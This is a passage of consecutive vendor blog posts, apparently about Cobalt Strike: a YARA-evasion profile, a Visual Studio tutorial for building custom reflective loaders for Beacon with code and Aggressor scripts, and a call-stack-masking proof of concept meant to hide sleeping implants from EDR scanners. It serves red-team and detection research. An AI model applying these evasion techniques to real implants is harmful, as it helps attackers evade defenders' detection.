          strrep "beacon.x64.dll" "<CHANGEME>";
          strrep "(admin)" "(adm)";

Note that this is a suggested profile for bypassing YARA signatures (there are likely to be many other security controls in place and some of these options may not be desired depending on the context).

At this point, the next line of defence for defenders is either traditional memory scanning approaches for injected code or hunting for sleeping threads with unbacked memory (See for an example of this detection technique). Both of which are much more complicated problems to solve at scale. Furthermore, with the 4.8 release you can enable stack spoofing to bypass the latter. This can be enabled once again by modifying sleepmask.c to the below and recompiling/reloading the resulting .cna script:

// #include "evasive_sleep.c" 
#include "evasive_sleep_stack_spoof.c" 

This does include a default stack to spoof but as ever customisation is recommended. For more guidance see the README in the Arsenal kit.

As a final note, the analysis in this blog post is feeding in to changes that we plan to make in the next Cobalt Strike release. We want to give users more control over the reflective loading process for both Beacon and post-ex DLLs and enable users to easily push back against YARA signatures.

Revisiting the User-Defined Reflective Loader Part 1: Simplifying Development

This blog post accompanies a new addition to the Arsenal Kit – The User-Defined Reflective Loader Visual Studio (UDRL-VS). Over the past few months, we have received a lot of feedback from our users that whilst the flexibility of the UDRL is great, there is not enough information/example code to get the most out of this feature. The intention of this kit is to lower the barrier to entry for developing and debugging custom reflective loaders. This post includes a walkthrough of creating a UDRL in Visual Studio that facilitates debugging, an introduction to UDRL-VS, and an overview of how to apply a UDRL to Beacon.

Note: There are many people out there that prefer to use tools such as MingGW/GCC/LD/GDB etc. and we salute you. However, this post is intended for those of us that like the simplicity of Visual Studio and enjoy a GUI. To develop this template we used Visual Studio Community 2022.

Reflective Loading

Beacon is just a Dynamic Link Library (DLL). As a result, it needs to be “loaded” for us to work with it. There are many different ways to load a DLL in Windows, but Reflective DLL Injection, first published by Stephen Fewer in 2008, provides the means to load a DLL completely in memory. There is a lot of information available regarding PE files, reflective loading, and even improving upon Reflective DLL Injection. Therefore, this post will not delve into this in much detail. Fundamentally though, a reflective loader must:

  • Allocate some memory.
  • Copy the target DLL into that memory allocation.
  • Parse the target DLL’s imports/load the required modules/resolve function addresses.
  • Rebase the DLL (fix the relocations).
  • Locate the DLL’s Entry Point.
  • Execute the Entry Point.

In Stephen Fewer’s original implementation, the code used to load the DLL into memory is compiled into the DLL and “exported” as a function. This is how Beacon’s default reflective loader works; if you inspect Beacon’s exported functions you’ll find one called ReflectiveLoader() which is where the magic happens. The following screenshot shows Beacon’s Export Address Table (EAT) and its ReflectiveLoader() function in CFF Explorer.

Figure 1. Beacon’s Export Address Table in CFF Explorer.

Note: Typically, when a reflective loader is implemented in this fashion, a small shellcode stub is also written to the start of the PE file (over the DOS header) to ensure that execution is correctly directed to the right place (the ReflectiveLoader() function). This is what makes it position independent as it’s possible to simply write the reflective DLL to memory, start a thread and let it run.

In 2017, an analysis of the Double Pulsar User Mode Injector (Double Pulsar) leaked by Shadow Brokers showed an alternate approach to reflective loading (archive link). Double Pulsar differed because it was not compiled into the DLL but prepended in front of it. This approach allowed it to reflectively load any DLL. Later in 2017, the Shellcode Reflective DLL Injection (sRDI) project was released which used a similar approach. sRDI is able to take an arbitrary PE file and make it position independent which means it can also be used to load Beacon.

The following high-level diagram shows the different locations of the reflective loader between Stephen Fewer’s approach and Double Pulsar.

Figure 2. The different locations of ReflectiveLoader().

The User-Defined Reflective Loader (UDRL)

The UDRL is an important aspect of Cobalt Strike’s evasion strategy. Cobalt Strike achieves “evasion through flexibility”, meaning we give you the tools you need to modify default behaviors and customize Beacon to your liking. This was something that Raphael Mudge felt strongly about and will remain a key part of the Cobalt Strike strategy moving forward.

As described above, Beacon’s default ReflectiveLoader() is compiled into Beacon and exported. As a result, the UDRL was originally intended to work in the same fashion. The Teamserver would take a given UDRL and use it to overwrite Beacon’s default ReflectiveLoader() function. A great example of a UDRL that utilizes this workflow is BokuLoader by Bobby Cooke.

In this blog post, we’ll be exploring the same approach used by Double Pulsar and will therefore append Beacon to our loader as shown in Figure 2. TitanLdr by Austin Hudson is an excellent example of a UDRL that uses this approach. AceLdr by Kyle Avery is another very good example that also includes some additional functionality for avoiding memory scanners.

There are likely many other UDRLs available, and without a doubt even more that have not been made public. The above projects have been mentioned as they are impressive public examples. If you’ve developed a UDRL for Cobalt Strike yourself and you’d like to share it, you can submit it to the Cobalt Strike Community Kit.

Enter Visual Studio

The original UDRL example provided in the Arsenal Kit is a slightly modified version of Stephen Fewer’s reflective loader, so here we’ll also start in the same place. To save a lot of unnecessary content, we will not cover the process of creating an empty Visual Studio project and copy/pasting code. The only slight difference at this stage however is that our project files were created with the .cpp extension. This minor change to .cpp allows the project to access some additional functionality (more on this later). For clarity, the folder layout of the project after copy/pasting Stephen Fewer’s code has been illustrated below.

├── Header Files/
│ ├── ReflectiveDLLInjection.h
│ └── ReflectiveLoader.h
├── Source Files/
└── ReflectiveLoader.cpp

The purpose of this Visual Studio project is to create a PE executable file that contains our reflective loader. This executable file can then be compiled in either Debug mode or Release mode. In Debug mode it can be used in combination with Visual Studio’s debugger to step through the code and Debug our loader. In Release mode, we can strip our loader out of the resulting executable and prepend it to Beacon to create a Double Pulsar style payload as illustrated in Figure 2.

To compile the project and ensure that it executes correctly, we need to change some of Visual Studio’s Project Settings. These have been outlined below:

  • Entry Point (ReflectiveLoader) – This setting changes the default starting address to Stephen Fewer’s ReflectiveLoader() function. A custom entry point would normally be problematic for a traditional PE file and require some manual initialization. However, Stephen Fewer’s code is position independent, so this won’t be a problem.
  • Enable Intrinsic Functions (Yes) – Intrinsic functions are built into the compiler and make it possible to “call” certain assembly instructions. These functions are “inlined” automatically which means the compiler inserts them at compile time.
  • Ignore All Default Libraries (Yes) – This setting will alert us when we call external functions (as that would not be position independent).
  • Basic Runtime Checks (Default) – This setting is configured correctly in Release mode by default, but changing it in the Debug configuration disables some runtime error checking that will throw an error due to our custom entry point.
  • Optimization – We’ve enabled several of Visual Studio’s different Optimization settings and opted to favor smaller code where possible. However, at certain points in the template we’ve disabled it to ensure our code works as expected.

Note: Optimization can be great because it makes our code smaller and faster. However, it’s important to know what can be optimized and what can’t, which is made even more complex when writing position independent code. If you run into problems, it can be worth checking whether something is being optimized away by the compiler.

Function Positioning

In this post, we are using the Double Pulsar approach to reflective loading. Therefore, after compiling the Release build, we will extract the loader from the resulting executable and prepend it to Beacon to create our payload. As part of this model, we need to ensure that the loaders’ entry point sits at the very start of the shellcode. We also need to make sure that we can identify the end of the loader in order to find out where Beacon begins. This has been illustrated in the following high-level diagram:

Figure 3. A high-level overview of Function Positioning.

There are different ways to achieve this “positioning”, however, for the purposes of this template we have used the code_seg pragma directive. code_seg can be used to specify which section is used to store specific functions. These sections can then be ordered using alphabetical values e.g .text$a. This is possible because the linker takes the section names and splits them at the first dollar sign, the value after it is then used to sort the sections which facilitates the alphabetical ordering. A similar approach to function ordering can also be seen in both TitanLdr/AceLdr in link.ld.

In the example below, we have placed the ReflectiveLoader() function within .text$a to ensure that it is positioned at the start of the .text section and therefore the start of the payload. The remaining functions in ReflectiveLoader.cpp have been placed inside .text$b to ensure that they are located after ReflectiveLoader(). The compiler can order the functions within a given section however it chooses, so this approach of using $a and $b enforces the required layout.

#pragma code_seg(".text$a")
ULONG_PTR WINAPI ReflectiveLoader(VOID) {
#pragma code_seg(".text$b")

Note: In some public examples of reflective loaders, a small shellcode stub is used at the very start of execution to ensure stack alignment. This approach is not explicitly required in our template at this point as the loader is intended for use with memory allocation/thread creation APIs for simplicity. It should therefore be aligned correctly. If you do require this stack alignment, it would still be possible to use a similar shellcode stub in this model but it can be left as an exercise for the reader. Matt Graeber’s Writing Optimized Windows Shellcode in C and the associated PIC_Bindshell code demonstrate this. In addition, it can also be found in TitanLdr/Aceldr in start.asm.

We can use the same approach described above to also locate the end of the loader. In the code snippet below, we have used the code_seg directive once more to position the LdrEnd() function. Previously, we used $a to position ReflectiveLoader() at the start of the .text section and here we are using $z to position LdrEnd() at the end of it.

#pragma code_seg(".text$z")
void LdrEnd() {}

The following high-level diagram illustrates the code sections described above.

Figure 4. A high-level overview of Function Positioning with alphabetical values.

The Release build is designed to work with the Teamserver which will append Beacon to our loader. As part of the Debug build, we need to simulate the Release mode behavior. The code_seg directive can also be used in combination with the declspec allocate specifier to position the contents of data items. In the example below, we use the code_seg directive to specify a section, and then use the declspec specifier to place the contents of Beacon.h (unsigned char beacon_dll[]) within it. This logic was placed in End.h/End.cpp for simplicity.

#ifdef _DEBUG
#pragma code_seg(".text$z")
#include "Beacon.h"

The folder layout after adding the above files to the project has been illustrated below.

├── Header Files/
│   ├── Beacon.h
│   ├── End.h
│   ├── ReflectiveDLLInjection.h
│   └── ReflectiveLoader.h
├── Source Files/
    ├── End.cpp
    └── ReflectiveLoader.cpp

This is the crux of our development environment, by positioning LdrEnd()/Beacon.h we’re able to easily find the location of Beacon. This change to Stephen Fewer’s original code has been shown below.

#ifdef _DEBUG
    uiLibraryAddress = (ULONG_PTR)beacon_dll;
#elif _WIN64
    uiLibraryAddress = (ULONG_PTR)&ldr_end + 1;

Note: The x86 version of the Release build works in a slightly different fashion to the one described above. Positioning LdrEnd() and referencing its address works in x64 because the compiler identifies it using relative addressing. Disassembling the binary shows a “load effective address” at [rip + offset] (LEA RSI,[RIP+0X6B9]). This approach does not work in x86 because the absolute address of LdrEnd() is calculated at compile time. Therefore, it points to a completely incorrect location when the loader is prepended to Beacon (MOV EBX, 0X401600). To provide support for x86, we recycled Stephen Fewer’s caller() function in our template and renamed it to GetLocation(). This function simply returns the calling function’s return address via the _ReturnAddress() intrinsic function. Instead of referencing the address of LdrEnd() in x86, we call it, which in turn calls GetLocation(). We then use simple pointer arithmetic to work out the location of Beacon. We could’ve done this for both x86 and x64 but included both to show the two approaches and highlight the difference.

At this point, we now have an operational Debug build. We can set a breakpoint, click “Local Windows Debugger”, and use all the features of Visual Studio’s debugger.


In the previous section we used Stephen Fewer’s original reflective DLL injection code to show that only minor modifications were required to get up and running. However, we wanted to take this a step further and provide a template to support developing and debugging UDRLs for Cobalt Strike.

As part of creating this template, we have attempted to simplify Stephen Fewer’s original code by splitting it into separate functions, removing unused code, updating types and providing more descriptive variable names. In addition, we have also provided some helper functions to speed up writing position independent code (PIC). The following sections provide an overview of these helper functions. For additional help writing PIC, there is an excellent public framework available called ShellcodeStdio that also demonstrates the techniques described below.

Compile Time Hashing

In Stephen Fewer’s original code, several hashes had been pre-calculated and included in ReflectiveLoader.h. This solution works well, but to simplify it further and make it easier for you to include your own hashes, we have added “compile time hashing”.

As the CPP reference states, the “constexpr” specifier makes it possible to “evaluate the value of a function or variable at compile time”. Therefore, it is possible to use the constexpr specifier as part of a hash function to ensure that the hash is generated at compile time. This means instead of pre-calculating hashes and including them in our header file, we can have the compiler/preprocessor hash our strings for us.

Note: Compile time hashing will help us more in a subsequent post, but at this point, an added benefit is that it makes it easier to rotate Stephen Fewer’s HASH_KEY value used to hash the strings. It is not a silver bullet but changing the HASH_KEY could help to push back on simple static signatures.

In the template, we have replaced Stephen Fewer’s static hash values with calls to CompileTimeHash().

constexpr DWORD KERNEL32DLL_HASH = CompileTimeHash("kernel32.dll");
constexpr DWORD NTDLLDLL_HASH = CompileTimeHash ("ntdll.dll");

constexpr DWORD LOADLIBRARYA_HASH = CompileTimeHash("LoadLibraryA");
constexpr DWORD GETPROCADDRESS_HASH = CompileTimeHash("GetProcAddress");
constexpr DWORD VIRTUALALLOC_HASH = CompileTimeHash("VirtualAlloc");
constexpr DWORD NTFLUSHINSTRUCTIONCACHE_HASH = CompileTimeHash("NtFlushInstructionCache");

Note: We have also modified the original hash() function in the template to normalize strings to uppercase before hashing so that “lOadLiBrarYa” and “LoadLibraryA” result in the same hash.


It can be helpful to print strings as part of debugging, but as we mentioned earlier, a custom entry point can affect startup routines, etc. This means that at the start of execution we do not have direct access to the C/C++ standard library or any Windows APIs.

As part of simplifying Stephen Fewer’s original code, we broke it down into independent functions. As a result, we now have a GetProcAddressByHash() function in Utils.cpp that we can use to resolve function addresses. To save a lot of time and effort we have used this to create a _printf() function for Debug purposes and included it in our template. This _printf() function works in the same way as the original printf() so you can give it format specifiers and use it to print variables, etc. We also wrapped it into a macro called PRINT() which will only generate the _printf() calls when the project is compiled in Debug mode.

PRINT("[+] Beacon Start Address: %p\n", beaconBaseAddress);

Here is a screenshot of the above function in action. We have printed the location of Beacon and then found it using the disassembly view in Visual Studio.

Figure 5. Finding Beacon’s MZ Header with a call to PRINT().


Strings are saved into the .data/.rdata section of a PE file and will therefore be unavailable once we extract the loader (which will be exclusively found in the .text section). It’s therefore important to understand how strings are created and stored within a PE file. Compiler Explorer is an excellent website for seeing how your code is assembled and even color codes the input/output. The following screenshot shows three different approaches to declaring strings in C++.

Figure 6. A demonstration of how strings are created and stored with Compiler Explorer.

The first declaration uses an array initializer; this has been highlighted in yellow. The output window shows how move instructions are used to construct the string one byte at a time. This means that all the code is found within the .text section.

The next approach uses a string literal to initialize the data. As shown in the purple output, the bytes of the string are copied into the array from the .data section. This has been broken down and explained below.

lea    rax, QWORD PTR string$[rsp]     ; load the address of where the string will be on the stack (destination address)
lea    rcx, OFFSET FLAT : $SG2657      ; load the address of the string in the .data section (source address)
mov    rdi, rax			       ; save destination address into destination pointer (RDI)
mov    rsi, rcx			       ; save source address into source pointer (RSI)
mov    ecx, 12 			       ; save the size of the string into the count register (ECX)
rep    movsb  		               ; move a single byte from RDI to RSI and repeat based on ECX (size of string)

In the final example, a char pointer is initialized with a string literal. As shown in the red output, it references the value in the .data section. This has also been broken down and explained below.

lea    rax, OFFSET FLAT:$SG2658        ; load the address of the string in the .data section
mov    QWORD PTR stringPtr$[rsp], rax  ; save the address of the string on the stack

After reviewing the above, we can see the only real option for us when writing PIC is to either avoid using strings (not always possible) or use the first approach in the example above.

char helloWorld[] = {'H','e','l','l','o',' ','W','o','r','l','d','\0'};

As with everything when writing PIC, this is a little clumsy and cumbersome. However, Evan McBroom has provided a very simple and elegant solution to this problem. Evan discovered that when using the constexpr specifier to initialize a char array with a string literal, the resulting string was constructed in the same fashion as the array initializer described above. The following screenshot demonstrates this with Compiler Explorer.

Figure 7. A demonstration of Evan McBroom’s PIC string with Compiler Explorer.

Evan wrapped this into two macros that can be used to create both ASCII strings and wide strings.

#define PIC_STRING(NAME, STRING) constexpr char NAME[]{ STRING }
#define PIC_WSTRING(NAME, STRING) constexpr wchar_t NAME[]{ STRING }

We have added these two macros to the template, this can be seen in the following example.

PIC_STRING(example, "[!] Hello World\n");

Release Mode

The ability to develop and debug inside Visual Studio is great, but what about using this loader in production? The great thing about writing a PIC loader is that everything we need is located inside the resulting PE files’ .text section. This means we can use a simple Python script to extract our compiled executable’s .text section and voila, we have our UDRL!

Note: This is why we used the “Function Positioning” described earlier. We needed to ensure that our ReflectiveLoader() function was positioned correctly at the very start of the .text section, which becomes the very start of the UDRL (aka the loader).

There are many examples of Python scripts that do something similar; both TitanLdr and AceLdr have similar scripts in their respective repositories. We have also included a script in the Arsenal kit template called Visual Studio allows us to incorporate this script as a post-build event and so the Release build will automatically create udrl-vs.bin in the relevant Output Directory.

To simplify testing and development, also facilitates shellcode execution. This allows you to quickly test the loader without having to go via the Teamserver. We’d strongly recommend using this frequently to test your work. When writing PIC, things will often work in Debug mode but not in Release mode. For example, you can easily be caught out by forgetting the constepxr specifier, by forgetting to initialize pointers, or by using strings that aren’t PIC.

C:\> py.exe prepend-udrl .\beacon.x64.bin .\x64\Release\udrl-vs.exe

            _      _
           | |    | |
  _   _  __| |_ __| |  _ __  _   _
 | | | |/ _` | '__| | | '_ \| | | |
 | |_| | (_| | |  | |_| |_) | |_| |
  \__,_|\__,_|_|  |_(_) .__/ \__, |
                      | |     __/ |
                      |_|    |___/

[+] Success: Extracted loader
[*] Size of loader: 1229
[+] Start Address: 0x1b690d90000
[+] Shellcode Executed

Note: Make sure to use the 32-bit version of Python when testing x86 loaders. It will save you a couple of minutes of confusion…

Previously we used the Double Pulsar approach to loading because it simplified our Development/Debugging and provided an alternate way to write a UDRL. However, there is no reason why we can’t still use the “original” UDRL workflow and simply replace Beacon’s default loader with the one we have created.

The UDRL-VS template contains an additional Build Configuration called “Release (Stephen Fewer)”. This Build Configuration still creates the same PIC loader, however, instead of using the LdrEnd() function to calculate the location of Beacon, it uses Stephen Fewer’s original approach of walking backward through memory to find the start address of the DLL that is being loaded (Beacon).

To make it easy to test this type of loader, we have also included an option in to overwrite Beacon’s default loader and execute the resulting payload.

C:\> py.exe stomp-udrl .\beacon.x64.bin ".\x64\Release (Stephen Fewer)\udrl-vs.exe"

            _      _
           | |    | |
  _   _  __| |_ __| |  _ __  _   _
 | | | |/ _` | '__| | | '_ \| | | |
 | |_| | (_| | |  | |_| |_) | |_| |
  \__,_|\__,_|_|  |_(_) .__/ \__, |
                      | |     __/ |
                      |_|    |___/

[+] Success: Extracted loader
[*] Size of loader: 1277
[*] Found ReflectiveLoader - RVA: 0x17aa4       File Offset: 0x16ea4
[+] Success: Applied UDRL to DLL
[+] Start Address: 0x27239a20000
[+] Shellcode Executed

Once your loader has been tested and works as expected, it can be used in combination with an Aggressor Script to make it operational. We don’t strictly need to use Aggressor. We could use a script like to create the payload, however, Aggressor Script has several functions that will simplify customization in subsequent posts and saves writing extra code.

We can use some very simple Aggressor Scripts to apply our loaders to Beacon. The following example demonstrates how to append Beacon to our loader (almost a carbon copy of the one used by TitanLdr/AceLdr).

        # Declare local variables
	local('$arch $beacon $fileHandle $ldr $path $payload');
	$beacon = $2;
	$arch = $3;
	# Check the payload architecture
	if($arch eq "x64") {
            $path = getFileProper(script_resource("x64"), "Release", "udrl-vs.bin");
        else if ($arch eq "x86") {
            $path = getFileProper(script_resource("Release"), "udrl-vs.bin");
        else {
            warn("Error: Unsupported architecture: $arch");
            return $null;

	# Read the UDRL from the supplied binary file
	$fileHandle = openf( $path );
	$ldr = readb( $fileHandle, -1 );
	closef( $fileHandle );
	if ( strlen( $ldr ) == 0 ) {
		warn("Error: Failed to read udrl-vs.bin");
		return $null;

	# Prepend UDRL to Beacon and output the modified payload.
	return $ldr.$beacon;

The following example demonstrates how to overwrite Beacon’s default loader with our own. We still read the loader in the same fashion, but this time we call setup_reflective_loader(). This function does the heavy lifting for us; it finds the current ReflectiveLoader() function in Beacon and replaces it with the one provided.

        # Declare local variables
	local('$arch $beacon $fileHandle $ldr $path $payload');
	$beacon = $2;
	$arch = $3;
	# Check the payload architecture.
	if($arch eq "x64") {
            $path = getFileProper(script_resource("x64"), "Release (Stephen Fewer)", "udrl-vs.bin");
        else if ($arch eq "x86") {
            $path = getFileProper(script_resource("Release (Stephen Fewer)"), "udrl-vs.bin");
        else {
            warn("Error: Unsupported architecture: $arch");
            return $null;

	# Read the UDRL from the supplied binary file
	$fileHandle = openf( $path );
	$ldr = readb( $fileHandle, -1 );
	closef( $fileHandle );
	if ( strlen( $ldr ) eq 0 ) {
		warn("Error: Failed to read udrl-vs.bin");
		return $null;

	# Overwrite Beacon's ReflectiveLoader() with UDRL
	$payload = setup_reflective_loader($beacon, $ldr);

	# Output the modified payload.
	return $payload;

If we load either of the scripts above into Cobalt Strike and export a payload, we’ll see a message in the Script Console confirming that the custom loader was used. The resulting shellcode can then be used in combination with a Stage0 of your choosing.

Closing Thoughts

That concludes the first post of this series Revisiting the UDRL. As part of this post we have created a Visual Studio project with several Quality of Life (QoL) improvements. We’re now able to develop, debug and operationalize both Stephen Fewer’s original reflective loader and the Double Pulsar concept for Cobalt Strike using Visual Studio. The template developed as part of this project can be found in the Arsenal Kit under udrl-vs in “kits”. In the next installment we’ll explore some evasive techniques as well as how to modify default behaviors.

Behind the Mask: Spoofing Call Stacks Dynamically with Timers

This blog introduces a PoC technique for spoofing call stacks using timers. Prior to our implant sleeping, we can queue up timers to overwrite its call stack with a fake one and then restore the original before resuming execution. Hence, in the same way we can mask memory belonging to our implant during sleep, we can also mask the call stack of our main thread. Furthermore, this approach avoids having to deal with the complexities of X64 stack unwinding, which is typical of other call stack spoofing approaches. 

The Call Stack Problem

The core memory evasion problem from an attacker’s perspective is that implants typically operate from injected code (ignoring any module hollowing approaches). Therefore, one of the pillars of modern detection is to monitor for the creation of threads which belong to unbacked (or ‘floating’) memory. This blog by Elastic is a good approximation to the state of the art in terms of anomalous thread detection from an EDR perspective. 

However, another implication of this problem for attackers is that all the implants’ API calls will also originate from unbacked memory. By examining call stacks either at the time of a specific API invocation, or by proactively inspecting running threads (i.e. ones which are sleeping), suspicious call stacks can be identified via return addresses to unbacked memory.  

This is one detection area which historically has not received a huge amount of focus/research in modern EDR stacks (in my experience). However, this is starting to change with the release of open-source tools such as Hunt-Sleeping-Beacons, which will proactively inspect “sleeping” threads to find call stacks with unbacked regions. This demonstrably provides a high confidence signal of suspicious activity; hence it is valuable to EDRs and something attackers need to seriously consider in their evasion TTPs.  

Call Stack Inspection at Rest

The first problem to solve from an attacker’s perspective is how to manipulate the call stack of a sleeping thread so that it can bypass this type of inspection. This could be performed by the actual thread itself or via some external mechanism (APCs etc.).  

Typically, this is referred to as “spoofing at rest” (h/t to Kyle Avery here for this terminology in his excellent blog on avoiding memory scanners). The first public attempt to solve this problem is mgeeky’s ThreadStackSpoofer, which overwrites the last return address on the stack. 

As a note, the opposite way to approach this problem is by having no thread or call stack present at all, à la DeathSleep. The downside of this technique is the potential for the repeated creation of unbacked threads, (depends on the exact implementation), which is a much greater evil in modern environments. However, future use of Hardware Stack Protection by EDR vendors may make this type of approach inevitable. 

Call Stack Inspection During Execution – User Mode

The second problem is call stack inspection during execution, which could either be implemented in user mode or kernel mode. In terms of user mode implementation, this would typically involve hooking a commonly abused function and walking the stack to see where the call originated. If we find unbacked memory, it is highly likely to be suspicious. An obvious example of this is injected shellcode stagers calling WinInet functions. MalMemDetect is a good example of an open-source project that demonstrates this detection technique. 

For these scenarios, techniques such as RET address spoofing are normally sufficient to remove any evidence of unbacked addresses from the call stack. At a high level, this involves inserting a small assembly harness around the target function which will manually replace the last return address on the stack and redirect the target function to return to a trampoline gadget (e.g. jmp rbx). 

Additionally, there is SilentMoonWalk which uses a clever de-syncing approach (essentially a ROP gadget built on X64 stack unwinding codes). This can dynamically hide the origin of a function call and will similarly bypass these basic detection heuristics. Most importantly to an operator, both these techniques can be performed by the acting thread itself and do not require any external mechanism. 

From an opsec perspective, it is important to note that many of the techniques referenced in this blog may produce anomalous call stacks. Whether this is an issue or not depends on the target environment and the security controls in place. The key consideration is whether the call stack generated by an action is being recorded somewhere (say in the kernel, see next section) and appended to an event/alert. If this is the case, it may look suspicious to trained eyes (i.e. threat hunters/IR). 

To demonstrate this, we can take SilentMoonWalk’s desync stack spoofing technique as an example (this is a slightly easier use case as other techniques can be implementation specific).  As stated previously, this technique needs to find functions which implement specific stack winding operations (a full overview of X64 stack unwinding is beyond the scope of this blog but see this excellent CodeMachine article for further reading).  

For example, the first frame must always perform a UWOP_SET_FPREG operation, the second UWOP_PUSH_NONVOL (rbp) etc. as demonstrated in windbg below:

0:000> knf
#   Memory  Child-SP          RetAddr               Call Site 
00           0000001d`240feb98 00007ffe`b622d831     win32u!NtUserWaitMessage+0x14 
08        40 0000001d`240ff140 00007ffe`b483b576     KERNELBASE!CreatePrivateObjectSecurity+0x31 
09        40 0000001d`240ff180 00007ffe`b48215a5     KERNELBASE!Internal_EnumSystemLocales+0x406 
0a       3e0 0000001d`240ff560 00007ffe`b4870e22     KERNELBASE!SystemTimeToTzSpecificLocalTimeEx+0x25 
0b       680 0000001d`240ffbe0 00007ffe`b6d87614     KERNELBASE!PathReplaceGreedy+0x82 
0c       100 0000001d`240ffce0 00007ffe`b71826a1     KERNEL32!BaseThreadInitThunk+0x14 
0d        30 0000001d`240ffd10 00000000`00000000     ntdll!RtlUserThreadStart+0x21 

0:000> .fnent KERNELBASE!PathReplaceGreedy+0x82 
Debugger function entry 000001cb`dda19c60 for: 
(00007ffe`b4870da0)   KERNELBASE!PathReplaceGreedy+0x82   |  (00007ffe`b4871050)   KERNELBASE!SortFindString
  06: offs 13, unwind op 3, op info 2	UWOP_SET_FPREG.

0:000> .fnent KERNELBASE!SystemTimeToTzSpecificLocalTimeEx+0x25 
Debugger function entry 000001cb`dda19c60 for:  
(00007ffe`b4821580)   KERNELBASE!SystemTimeToTzSpecificLocalTimeEx+0x25   |  (00007ffe`b482182c)   KERNELBASE!AddTimeZoneRules 
08: offs b, unwind op 0, op info 5	UWOP_PUSH_NONVOL reg: rbp. 

This output shows the call stack for the spoofed SilentMoonwalk thread (knf) and the unwind operations (.fnent) for two of the functions found on the call stack (PathReplaceGreedy / SystemTimeToTzSpecificLocalTimeEx). 

The key take away is that this results in a call stack which would never occur for a legitimate code path (and is therefore anomalous). Hence, KERNELBASE!PathReplaceGreedy does not call KERNELBASE!SystemTimeToTzSpecificLocalTimeEx … and so on. Furthermore, an EDR could itself attempt to search for this pattern of unwind codes during a proactive scan of a sleeping thread. Again, whether this is an issue depends entirely on the controls/telemetry in place but as operators it is always worth understanding the pros and cons of all the techniques at our disposal. 

Lastly, a trivial way of calling an API with a ‘clean’ call stack is to get something else to do it for you. The typical example is to use any callback type functionality provided by the OS (same applies for bypassing thread creation start address heuristics). The limitation for most callbacks is that you can normally only supply one argument (although there are some notable exceptions and good research showing ways around this). 

Call Stack Inspection During Execution – Kernel Mode

A user mode call stack can be captured inline during any of the kernel callback functions (ie. on process creation, thread creation/termination, handle access etc…). As an example, the SysMon driver uses RtlWalkFrameChain to collect a user mode call stack for all process access events (i.e. calling OpenProcess to obtain a HANDLE). Hence, this capability makes it trivial to spot unbacked memory/injected code (‘UNKNOWN’) attempting to open a handle to LSASS. For example, in this contrived scenario you would get a call stack similar to the following: 

0:020> knf 
#       Memory    Child-SP           RetAddr               Call Site 
00                0000004c`453cf428  00007ffd`7f1006fe     ntdll!NtOpenProcess 
01           8    0000004c`453cf430  00007ff6`98fe937f     KERNELBASE!OpenProcess+0x4e 
02          70    0000004c`453cf4a0  000002ad`c3fd1121     000002ad`c3fd1121 (UNKNOWN) 

Additionally, it is now possible to collect call stacks with the ETW threat intelligence provider.  The call stack addresses are unresolved (i.e. an EDR would need to keep its own internal process module cache to resolve symbols) but they essentially enable EDR vendors the potential to capture near real time call stacks (where the symbols are then resolved asynchronously). Therefore, this can be seen as a direct replacement for user mode hooking which is, critically, captured in the kernel. It is not unrealistic to imagine a scenario in the future in which unbacked/direct API calls to sensitive functions (VirtualAlloc / QueueUserApc / SetThreadContext / VirtualProtect etc.) are trivial to detect. 

These scenarios were the premise for some of my own previous research in to call stack spoofing during execution: The idea was to offload the API call to a new thread, which we could initialise to a fake state, to hide the fact that the call originated from unbacked memory. My original PoC applied this idea to OpenProcess but it could easily be applied to image loads etc.  

The key requirement here was that any arbitrary call stack could be spoofed, so that even if a threat hunter was reviewing an alert containing the call stack, it would still look indistinguishable from other threads. The downsides of this approach were the need to create a new thread, how best to handle this spoofed thread, and the reliance on a hard coded / static call stack.

Call Stack Masking

Having given a brief review of the current state of research in to call stack spoofing, this blog will demonstrate a new call stack spoofing technique: call stack masking. The PoC introduced in this blog post solves the spoofing at rest problem by masking a sleeping thread’s call stack via an external mechanism (timers). 

While researching this topic in the past, I spent a large amount of time trying to get to grips with the complexities of X64 stack unwinding in order to produce TTPs to perform stack spoofing. This complexity is also present in a number of the other techniques discussed above. However, it occurred to me that there is a much simpler way to spoof/mask the call stack without having to deal with these intricacies. 

If we consider a generic thread that is performing any kind of wait, by definition, it cannot modify its own stack until the wait is satisfied. Furthermore, its stack is always read-writable. Therefore, we can use timers to:

  1. Create a backup of the current thread stack
  2. Overwrite it with a fake thread stack
  3. Restore the original thread stack just before resuming execution 

Any timer objects could be used, but for convenience I based my PoC on C5Spider’s Ekko sleep obfuscation technique.  

The only remaining challenge is to work out the value of RSP once our target thread is sleeping. This can be achieved using compiler intrinsics (_AddressOfReturnAddress) to obtain the Child-SP of the current frame. Once we have this, we can subtract the total stack utilisation of the expected next two frames (i.e. KERNELBASE!WaitForSingleObjectEx and ntdll!NtWaitForSingleObject) to find the expected value of RSP at sleep time.

Lastly, to make our masked thread look as realistic as possible, we can copy the start address and call stack of an existing (and legitimate) thread.


The PoC can be found here:

The PoC operates in two modes: static and dynamic. The static mode contains a hard coded call stack that was found in spoolsv.exe via Process Explorer. This thread is shown below and can be seen to be in a state of ‘Wait:UserRequest’ via KERNELBASE!WaitForSingleObjectEx:

The screenshot below demonstrates static call stack masking. The start address and call stack of our masked thread are identical to the thread identified in spoolsv.exe above:

The obvious downside of the static mode is that we are still relying on a hard coded call stack. To solve this problem the PoC also implements dynamic call stack masking. In this mode, it will enumerate all the accessible threads on the host and find one in the desired target state (i.e. UserRequest via WaitForSingleObjectEx). Once a suitable thread stack is found, it will copy it and use that to mask the sleeping thread. Similarly, the PoC will once again copy the cloned thread’s start address to ensure our masked thread looks legitimate.

If we run the PoC with the ‘–dynamic’ flag, it will locate another thread’s call stack to mimic as shown below: 

The target process (taskhostw.exe / 4520), thread (5452), and call stack identified above are shown below in Process Explorer:

If we now examine the call stack and start address of the main thread belonging to CallStackMasker, we can see it is identical to the mimicked thread:

Below is another example of CallStackMasker dynamically finding a shcore.dll based thread call stack from explorer.exe to spoof: 

The screenshot below shows the real ‘unmasked’ call stack:

Currently the PoC only supports WaitForSingleObject but it would be trivial to add in support for WaitForMultipleObjects.

As a final note, this PoC uses timer-queue timers, which I have previously demonstrated can be enumerated in memory: However, this PoC could be modified to use fully fledged kernel timers to avoid this potential detection opportunity. 

Process Injection Update in Cobalt Strike 4.5

Process injection is a core component to Cobalt Strike post exploitation. Until now, the option was to use a built-in injection technique using fork&run. This has been great for stability, but does come at the cost of OPSEC.

